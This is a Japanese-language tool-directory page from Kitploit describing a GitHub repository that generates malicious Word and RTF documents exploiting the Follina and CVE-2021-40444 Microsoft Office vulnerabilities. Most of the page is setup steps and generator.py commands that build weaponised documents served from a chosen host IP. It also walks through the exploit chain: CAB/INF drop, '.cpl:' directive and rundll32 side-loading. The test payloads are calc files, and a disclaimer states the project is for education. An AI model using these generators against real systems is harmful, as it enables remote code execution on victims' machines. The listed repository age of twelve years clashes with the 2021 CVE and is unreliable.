Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Follina-CVE-and-CVE-2021-40444 — このリポジトリには、Microsoft OfficeのFollina CVEおよびCVE-2021-40444の脆弱性を悪用するためのスクリプトとリソースが含まれています。スクリプトは、標的システム上で任意のコードを実行できる悪意のあるドキュメントファイルを生成します。 | Kitploit
ツール/GitHubGitHub/basim-ahmad/follina-cve-and-cve-2021-40444
ペイロード生成エクスプロイトウェブアプリケーション悪用マルウェア分析ペネトレーションテスト学習と教育
GitHubbasim-ahmad/follina-cve-and-cve-2021-40444

Follina-CVE-and-CVE-2021-40444

このリポジトリには、Microsoft OfficeのFollina CVEおよびCVE-2021-40444の脆弱性を悪用するためのスクリプトとリソースが含まれています。スクリプトは、標的システム上で任意のコードを実行できる悪意のあるドキュメントファイルを生成します。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
12年前未レビュー

Follina CVE および CVE-2021-40444 脆弱性の悪用

目次

  1. はじめに
  2. 前提条件
  3. セットアップとインストール
  4. 使用方法
  5. 詳細な説明
  6. コマンド
  7. 免責事項

はじめに

このリポジトリには、Microsoft Office における Follina CVE および CVE-2021-40444 脆弱性を悪用するためのスクリプトとリソースが含まれています。これらのスクリプトは、ターゲットシステム上で任意のコードを実行できる悪意のある文書ファイルを生成します。

前提条件

  • Flare VM
  • Python 3.x
  • Microsoft Word
  • 必要な Python パッケージ(requirements.txt に記載)

セットアップとインストール

  1. Flare VM のセットアップ:

    • Flare VM がインストールされていることを確認してください。VM の認証情報は以下の通りです:
      • ユーザー名: lab
      • パスワード: password
  2. Python と仮想環境:

    root@kitploit:~
    git clone https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444.git
    cd CVE-2021-40444
    
    • 仮想マシンに Python と pip がインストールされていることを確認してください。
    • 以下のコマンドを使用して virtualenv パッケージをインストールします:
      root@kitploit:~
      pip install virtualenv
      
    • venv という名前の仮想環境を作成します:
      root@kitploit:~
      python -m virtualenv venv
      
    • 仮想環境をアクティブ化します:
      root@kitploit:~
      venv\Scripts\activate.bat
      
    • 必要なパッケージをインストールします:
      root@kitploit:~
      pip install -r requirements.txt
      

使用方法

  1. エクスプロイトの生成:

    • プロジェクトディレクトリに移動し、以下のコマンドを実行してエクスプロイトを生成します:
      root@kitploit:~
      python generator.py -u http://192.168.197.132 -P test\calc.dll --host
      
      192.168.197.132 を自分の IP アドレスに置き換えてください。
  2. 生成された文書へのアクセス:

    • 生成された .docx ファイルは以下のディレクトリに配置されます:
      root@kitploit:~
      C:\Users\Lab\Desktop\project\CVE-2021-40444\out\document.docx
      

詳細な説明

チェーンエクスプロイト

  • 文書(.docx)が開かれます。
  • 文書には document.xml.rels 内で悪意のある HTML を指すリレーションシップが含まれています。
  • その HTML リンクは IE プレビューで開かれます。
  • オブジェクトが CAB ファイルと、JScript に埋め込まれ ".cpl:" ディレクティブが前に付加された INF ファイルを指す iframe を指します。
  • CAB ファイルが開かれ、INF ファイルが %TEMP%Low ディレクトリに保存されます。
  • INF ファイルが ".cpl:" ディレクティブを使用して開かれ、rundll32 が INF ファイルをサイドロードします。

スクリプトの概要

generator.py

  • CVE-2021-40444 のエクスプロイトを実装し、Microsoft Office を介したリモートコード実行を可能にします。
  • CAB ファイルのパッチ適用、RAR ファイルの作成、ペイロードの生成など、さまざまな補助関数が含まれています。

cab_parser.py

  • CAB ファイルヘッダーを表示するためのツールです。
  • CAB ファイルを処理および解析するためのクラスとメソッドを定義します。

セクション 2.0: Flare VM でのセットアップ

  • 必要なツールとパッケージをインストールします。
  • 仮想環境を作成し、アクティブ化します。
  • requirements.txt から Python パッケージをインストールします。

コマンド

  • 元のエクスプロイトを生成してローカルでテスト:
    root@kitploit:~
    python generator.py -u http://127.0.0.1 -P test\calc.dll --host
    
  • MS-MSDT(Follina 攻撃)を利用した CAB 不要のエクスプロイトを生成(DOCX と RTF の両方):
    root@kitploit:~
    python generator.py -u http://127.0.0.1 -P test\calc.ps1 --no-cab --host --convert
    
  • HTML スマイグリングを使用した CAB 不要のエクスプロイト(IE のみ)を生成し、IE でローカルテスト:
    root@kitploit:~
    python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
    
  • RAR を使用した CAB 不要のエクスプロイトを生成し、IE でローカルテスト:
    root@kitploit:~
    python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t
    

免責事項

このプロジェクトは教育目的のみです。責任を持って使用し、テストする許可がないシステムに対して脆弱性を悪用しないでください。この情報の誤用は刑事責任を問われる可能性があります。

ツールをダウンロード